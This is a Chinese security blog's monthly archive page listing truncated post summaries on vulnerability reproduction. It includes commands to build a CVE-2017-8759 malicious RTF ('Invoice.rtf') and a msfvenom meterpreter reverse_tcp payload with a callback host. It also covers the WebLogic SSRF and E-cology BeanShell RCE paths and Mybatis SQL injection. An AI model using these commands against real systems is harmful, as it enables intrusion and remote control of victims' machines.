Loading

03 2021 档案

摘要:kali下载python脚本,生成rtf文件: **下载脚本:**git clone https://github.com/bhdresh/CVE-2017-8759.git 生成rtf文件: python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf 阅读全文
posted @ 2021-03-17 17:27 Atomovo 阅读(251) 评论(0) 推荐(0)
摘要:环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ​ 放到VPS上,这里我们放到本机搭 阅读全文
posted @ 2021-03-17 17:24 Atomovo 阅读(412) 评论(0) 推荐(0)
摘要:# -*-coding:utf-8-*- # @Author:malphite.tang import json import requests from queue import Queue requests.packages.urllib3.disable_warnings() # 消除eque 阅读全文
posted @ 2021-03-17 09:00 Atomovo 阅读(441) 评论(0) 推荐(0)
摘要:python2语法:python -m SimpleHTTPServer python3语法:python -m http.server 在局域网中使用web去访问http:/IP:8000即可 可以指定端口号: python -m SimpleHTTPServer 8111 可以指定路径: cd到 阅读全文
posted @ 2021-03-16 21:07 Atomovo 阅读(218) 评论(0) 推荐(0)
摘要:一、环境搭建和知识储备 1.1、影响版本 漏洞编号:CVE-2014-4210 weblogic 10.0.2.0 weblogic 10.3.6.0 1.2、Docker搭建环境 1.进入vulhub/fastjson,启动docker即可 cd /root/vulhub/weblogic/ssr 阅读全文
posted @ 2021-03-16 20:57 Atomovo 阅读(722) 评论(0) 推荐(0)
摘要:本地Markdown文件上传到博客 参考:https://www.cnblogs.com/ccylhw/p/13954153.html 1.Typora 最漂亮的写作APPhttps://www.typora.io/ 2.Typroa到博客园 第一步:下载dotnet-sdk并安装 dotnet下载 阅读全文
posted @ 2021-03-16 20:17 Atomovo 阅读(358) 评论(1) 推荐(2)
摘要:漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2. 阅读全文
posted @ 2021-03-16 17:35 Atomovo 阅读(4564) 评论(0) 推荐(0)
摘要:Mybatis框架下易产生SQL注入漏洞的情况主要分为以下三种: 1、模糊查询 Select * from news where title like ‘%#{title}%’ 在这种情况下使用#程序会报错,新手程序员就把#号改成了$,这样如果java代码层面没有对用户输入的内容做处理势必会产生SQ 阅读全文
posted @ 2021-03-06 23:38 Atomovo 阅读(713) 评论(0) 推荐(0)